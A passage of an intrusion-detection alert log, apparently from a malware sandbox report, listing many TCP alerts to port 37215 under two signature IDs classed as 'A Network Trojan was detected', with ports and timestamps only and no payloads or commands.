              SID:2829579
              Source Port:49198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308785
              SID:2835222
              Source Port:59984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279553
              SID:2829579
              Source Port:49580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975205
              SID:2835222
              Source Port:38848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063754
              SID:2829579
              Source Port:50880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459871
              SID:2829579
              Source Port:60742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062262
              SID:2829579
              Source Port:56600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062398
              SID:2829579
              Source Port:39790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457913
              SID:2835222
              Source Port:46158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121988
              SID:2835222
              Source Port:56282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456439
              SID:2829579
              Source Port:52794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374691
              SID:2835222
              Source Port:35004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148549
              SID:2829579
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724619
              SID:2835222
              Source Port:59770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345431
              SID:2829579
              Source Port:52942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592076
              SID:2835222
              Source Port:39542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148997
              SID:2829579
              Source Port:39110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623579
              SID:2835222
              Source Port:45366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480925
              SID:2835222
              Source Port:55888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394038
              SID:2835222
              Source Port:33140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575439
              SID:2829579
              Source Port:34436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608770
              SID:2835222
              Source Port:38248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100636
              SID:2835222
              Source Port:42950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797317
              SID:2835222
              Source Port:51346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245747
              SID:2829579
              Source Port:35622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537748
              SID:2829579
              Source Port:38358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579645
              SID:2835222
              Source Port:36624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694761
              SID:2835222
              Source Port:34020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.529957
              SID:2829579
              Source Port:57080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203013
              SID:2835222
              Source Port:60172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441337
              SID:2835222
              Source Port:49938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928761
              SID:2835222
              Source Port:34774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545435
              SID:2829579
              Source Port:38210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187048
              SID:2829579
              Source Port:49824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726816
              SID:2829579
              Source Port:44818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694689
              SID:2829579
              Source Port:56532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313204
              SID:2829579
              Source Port:55858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441364
              SID:2829579
              Source Port:34542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536204
              SID:2829579
              Source Port:57762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550549
              SID:2835222
              Source Port:57038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513612
              SID:2835222
              Source Port:51424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698420
              SID:2829579
              Source Port:43804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873932
              SID:2829579
              Source Port:36964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188103
              SID:2829579
              Source Port:34768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482591
              SID:2829579
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595013
              SID:2829579
              Source Port:48542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233582
              SID:2829579
              Source Port:59746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575420
              SID:2835222
              Source Port:47018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420392
              SID:2829579
              Source Port:59500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340670
              SID:2829579
              Source Port:39254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.690302
              SID:2829579
              Source Port:35534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681344
              SID:2835222
              Source Port:49762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060111
              SID:2829579
              Source Port:41852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249140
              SID:2829579
              Source Port:43922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112026
              SID:2835222
              Source Port:35398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150850
              SID:2835222
              Source Port:54194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495275
              SID:2829579
              Source Port:36122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400623
              SID:2829579
              Source Port:59054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101691
              SID:2835222
              Source Port:33646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980860
              SID:2835222
              Source Port:44616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467858
              SID:2829579
              Source Port:35550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568744
              SID:2829579
              Source Port:42036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591900
              SID:2829579
              Source Port:49222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490949
              SID:2835222
              Source Port:42982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161635
              SID:2829579
              Source Port:49646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290205
              SID:2829579
              Source Port:57490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383292
              SID:2835222
              Source Port:36266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060857
              SID:2829579
              Source Port:55588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545708
              SID:2829579
              Source Port:57414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109536
              SID:2829579
              Source Port:35460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726748
              SID:2829579
              Source Port:51880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278649
              SID:2829579
              Source Port:60532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574457
              SID:2829579
              Source Port:58022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057371
              SID:2835222
              Source Port:44808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234109
              SID:2835222
              Source Port:32868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103680
              SID:2835222
              Source Port:54778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663563
              SID:2835222
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859981
              SID:2829579
              Source Port:60608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503815
              SID:2835222
              Source Port:45330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536323
              SID:2835222
              Source Port:39418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661339
              SID:2829579
              Source Port:34632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347551
              SID:2829579
              Source Port:59656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391536
              SID:2835222
              Source Port:42000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235755
              SID:2835222
              Source Port:60088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433730
              SID:2829579
              Source Port:41232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332259
              SID:2829579
              Source Port:60374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976745
              SID:2835222
              Source Port:60724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152771
              SID:2835222
              Source Port:43676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186987
              SID:2829579
              Source Port:41432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596632
              SID:2829579
              Source Port:59266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111497
              SID:2835222
              Source Port:56746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480399
              SID:2835222
              Source Port:45908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606874
              SID:2829579
              Source Port:48096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517885
              SID:2835222
              Source Port:35088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586050
              SID:2829579
              Source Port:41670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603693
              SID:2829579
              Source Port:53112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281563
              SID:2829579
              Source Port:35962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967318
              SID:2835222
              Source Port:39116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572382
              SID:2829579
              Source Port:54108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575574
              SID:2835222
              Source Port:47648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870345
              SID:2835222
              Source Port:53138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831624
              SID:2829579
              Source Port:32886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.834364
              SID:2829579
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453692
              SID:2835222
              Source Port:58806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570657
              SID:2835222
              Source Port:52244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535923
              SID:2835222
              Source Port:48626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421498
              SID:2829579
              Source Port:34484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076897
              SID:2835222
              Source Port:46096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209005
              SID:2835222
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161829
              SID:2829579
              Source Port:39642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360970
              SID:2829579
              Source Port:49284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694779
              SID:2829579
              Source Port:56802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278320
              SID:2829579
              Source Port:50368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519000
              SID:2829579
              Source Port:60878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544322
              SID:2829579
              Source Port:40538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281604
              SID:2829579
              Source Port:39138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426421
              SID:2835222
              Source Port:48564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526812
              SID:2829579
              Source Port:55408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.706563
              SID:2829579
              Source Port:33408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574681
              SID:2829579
              Source Port:46524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333843
              SID:2835222
              Source Port:42700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077038
              SID:2829579
              Source Port:46182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.743153
              SID:2829579
              Source Port:39202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113327
              SID:2829579
              Source Port:33756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374636
              SID:2835222
              Source Port:37522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860336
              SID:2835222
              Source Port:53992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186467
              SID:2835222
              Source Port:57452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045381
              SID:2829579
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061521
              SID:2835222
              Source Port:33734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833715
              SID:2829579
              Source Port:55468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991096
              SID:2829579
              Source Port:50208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421488
              SID:2835222
              Source Port:59692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061781
              SID:2829579
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457753
              SID:2835222
              Source Port:50436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230888
              SID:2829579
              Source Port:47594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537064
              SID:2835222
              Source Port:56140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433393
              SID:2829579
              Source Port:46594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457852
              SID:2829579
              Source Port:54586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661026
              SID:2829579
              Source Port:35892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395589
              SID:2835222
              Source Port:42304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157560
              SID:2829579
              Source Port:49220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445848
              SID:2835222
              Source Port:41972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.755693
              SID:2829579
              Source Port:59320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395007
              SID:2835222
              Source Port:46916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455238
              SID:2829579
              Source Port:35734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804738
              SID:2829579
              Source Port:43800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537559
              SID:2835222
              Source Port:35590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188077
              SID:2829579
              Source Port:36066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247757
              SID:2835222
              Source Port:37824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636822
              SID:2829579
              Source Port:47298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371982
              SID:2829579
              Source Port:35230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574820
              SID:2835222
              Source Port:54388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279692
              SID:2829579
              Source Port:60276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725307
              SID:2829579
              Source Port:57632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526836
              SID:2829579
              Source Port:40380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857143
              SID:2829579
              Source Port:59148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100541
              SID:2835222
              Source Port:49008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164008
              SID:2835222
              Source Port:46816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545453
              SID:2835222
              Source Port:35778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868004
              SID:2829579
              Source Port:38258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049304
              SID:2829579
              Source Port:50778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.876048
              SID:2835222
              Source Port:60794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689741
              SID:2829579
              Source Port:54342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664557
              SID:2829579
              Source Port:34606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254465
              SID:2829579
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459914
              SID:2829579
              Source Port:57670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045421
              SID:2829579
              Source Port:40246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623000
              SID:2835222
              Source Port:54508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.632762
              SID:2835222
              Source Port:54256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921199
              SID:2835222
              Source Port:54826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462911
              SID:2829579
              Source Port:47002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164548
              SID:2835222
              Source Port:51502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166855
              SID:2829579
              Source Port:33196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368535
              SID:2835222
              Source Port:42174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456911
              SID:2835222
              Source Port:42454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397717
              SID:2835222
              Source Port:49916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551762
              SID:2835222
              Source Port:54036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099594
              SID:2829579
              Source Port:40082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696263
              SID:2829579
              Source Port:46258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057453
              SID:2829579
              Source Port:38914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426460
              SID:2835222
              Source Port:35480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526808
              SID:2835222
              Source Port:50350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232634
              SID:2829579
              Source Port:54802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400682
              SID:2835222
              Source Port:47500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474627
              SID:2829579
              Source Port:33438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553313
              SID:2835222
              Source Port:44790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103072
              SID:2835222
              Source Port:52888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518903
              SID:2835222
              Source Port:48738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965537
              SID:2835222
              Source Port:34848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797810
              SID:2835222
              Source Port:35194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100717
              SID:2835222
              Source Port:45934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573280
              SID:2835222
              Source Port:45842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210208
              SID:2835222
              Source Port:58836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250626
              SID:2835222
              Source Port:41104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502372
              SID:2829579
              Source Port:46552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108094
              SID:2835222
              Source Port:53396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451132
              SID:2835222
              Source Port:38786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518910
              SID:2829579
              Source Port:35756
              Destination Port:37215
